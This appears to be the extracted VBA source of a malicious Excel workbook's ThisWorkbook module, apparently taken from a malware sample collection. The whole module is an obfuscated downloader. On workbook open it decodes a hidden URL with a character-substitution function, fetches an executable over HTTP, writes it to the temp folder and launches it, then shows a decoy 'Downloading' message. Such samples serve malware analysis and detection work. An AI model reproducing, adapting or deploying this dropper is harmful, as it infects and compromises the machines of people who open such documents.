Filename     : ./macros/8a65155aff384e11a0155ef7002bfa0f3ee8b066788002c4c85f80438749f5d3
OLE stream   : _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA filename : ThisWorkbook.cls
----------------------------------------
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_open()
Dim ¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹½¾«³¡®¬·»©¤ª¹¶¶µ¸¡
Dim ª©´ª¨°·«¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹
Set ª©´ª¨°·«¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹ = CreateObject("Shell.Application")

Dim ¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯
Set ¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯ = CreateObject("microsoft.xmlhttp")

¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹½¾«³¡®¬·»©¤ª¹¶¶µ¸¡ = Environ("tmp") + ¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯½§©µ®²µ³¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»("\VW§FMJà.ÂÛÂ")
¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯.Open "GET", ¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯½§©µ®²µ³¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»("hÖÖÓ://www.ÕÖÂÂlbÂÅdÂÔÕÔÃq.ÁÃ/ÙÓdÀÖÂÕ/ÖÔÄA.ÂÛÂ"), False
¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯.send
¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯½§©µ®²µ³¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»£º¹¥¿¦¯« = ¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯.responseBody
If ¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯.Status = 200 Then
Set ³²»¶·²¯´©ª¹³¿¹´¼¬¸¸°°¯©¢¾¥¾£¸¿¸·³¾¼¥¯¨¥§¡ºº¨§¢¼²¬£¯ª°¶¡¬¿¿¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯ = CreateObject("adodb.stream")
³²»¶·²¯´©ª¹³¿¹´¼¬¸¸°°¯©¢¾¥¾£¸¿¸·³¾¼¥¯¨¥§¡ºº¨§¢¼²¬£¯ª°¶¡¬¿¿¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯.Open
³²»¶·²¯´©ª¹³¿¹´¼¬¸¸°°¯©¢¾¥¾£¸¿¸·³¾¼¥¯¨¥§¡ºº¨§¢¼²¬£¯ª°¶¡¬¿¿¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯.Type = 1
³²»¶·²¯´©ª¹³¿¹´¼¬¸¸°°¯©¢¾¥¾£¸¿¸·³¾¼¥¯¨¥§¡ºº¨§¢¼²¬£¯ª°¶¡¬¿¿¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯.Write ¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯½§©µ®²µ³¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»£º¹¥¿¦¯«
³²»¶·²¯´©ª¹³¿¹´¼¬¸¸°°¯©¢¾¥¾£¸¿¸·³¾¼¥¯¨¥§¡ºº¨§¢¼²¬£¯ª°¶¡¬¿¿¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯.SaveToFile ¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹½¾«³¡®¬·»©¤ª¹¶¶µ¸¡, 2
³²»¶·²¯´©ª¹³¿¹´¼¬¸¸°°¯©¢¾¥¾£¸¿¸·³¾¼¥¯¨¥§¡ºº¨§¢¼²¬£¯ª°¶¡¬¿¿¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯.Close
End If
ª©´ª¨°·«¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹.Open (¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹½¾«³¡®¬·»©¤ª¹¶¶µ¸¡)

MsgBox "Downloading......"
End Sub

    Public Function ¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯½§©µ®²µ³¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»(£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹)
        ³¸®³²»¶·²¯´©ª¹³¿¹´¼¬¸¸°°¯©¢¾¥¾£¸¿¸·³¾¼¥¯¨¥§¡ºº¨§¢¼²¬£¯ª°¶¡¬¿¿¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦ = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥"
        ¬½©£®®º²®°¸¯µ¿·º¦®¯½§©µ®²µ³¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For i = 1 To Len(£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹)
            ¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹½¾«³¡®¬·»©¤ª¹¶¶µ¸¡³¸®³²»¶·²¯´©ª¹³¿¹´¼¬ = InStr(³¸®³²»¶·²¯´©ª¹³¿¹´¼¬¸¸°°¯©¢¾¥¾£¸¿¸·³¾¼¥¯¨¥§¡ºº¨§¢¼²¬£¯ª°¶¡¬¿¿¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦, Mid(£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹, i, 1))
            If ¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹½¾«³¡®¬·»©¤ª¹¶¶µ¸¡³¸®³²»¶·²¯´©ª¹³¿¹´¼¬ > 0 Then
                ¸¸°°¯©¢¾¥¾£¸¿¸·³¾¼¥¯¨¥§¡ºº¨§¢¼²¬£¯ª°¶¡¬¿¿¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯½§©µ®²µ³ = Mid(¬½©£®®º²®°¸¯µ¿·º¦®¯½§©µ®²µ³¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª, ¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹½¾«³¡®¬·»©¤ª¹¶¶µ¸¡³¸®³²»¶·²¯´©ª¹³¿¹´¼¬, 1)
                ¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´ = ¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´ + ¸¸°°¯©¢¾¥¾£¸¿¸·³¾¼¥¯¨¥§¡ºº¨§¢¼²¬£¯ª°¶¡¬¿¿¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯½§©µ®²µ³
            Else
                ¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´ = ¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´ + Mid(£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´¶°¿§«º¡²½¡³º¸¢¶ª©·»¬µ¯µ¬¢½¢µ²¼³¿¶¼¯¾ª¡¹, i, 1)
            End If
        Next
        ¾®¹µ¹¤¼´½¿¯¼¤½°©«¼¦¬½©£®®º²®°¸¯µ¿·º¦®¯½§©µ®²µ³¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«» = ¹»«²³¸¾»£·¬¡»·²«¦¥¦¤¬¾¬¶½½¨¦¥©¶¾º°ª©´ª¨°·«¤«»£º¹¥¿¦¯«´«¥¨³°¾¤»¶´»ª¡¼µº§ª¸¹£¹¼®»¢´µ´·ª§£¿¨¨²´
    End Function
